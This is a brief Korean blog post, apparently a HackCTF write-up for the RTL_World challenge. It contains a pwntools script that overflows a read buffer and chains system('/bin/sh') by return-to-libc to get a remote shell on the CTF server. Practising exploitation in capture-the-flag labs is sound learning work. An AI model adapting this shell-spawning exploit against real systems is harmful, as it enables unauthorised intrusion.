read에서 취약점이 발생하고 문제 제목대로 RTL 를 진행하면 된다
from pwn import *
r = remote('ctf.j0n9hyun.xyz', 3010)
e = ELF('./rtl_world')
r.sendlineafter('>>> ','5')
payload = 'A'*144
payload += p32(e.sym['system'])
payload += 'AAAA'
payload += p32(e.search('/bin/sh\x00').next())
r.sendline(payload)
r.interactive()
'HackCTF' 카테고리의 다른 글
HackCTF - RTL_Core (0) | 2021.11.21 |
---|---|
HackCTF - Random Key (0) | 2021.11.21 |
HackCTF - 1996 (0) | 2021.11.21 |
HackCTF - Poet (0) | 2021.11.21 |
HackCTF - g++ pwn (0) | 2021.11.21 |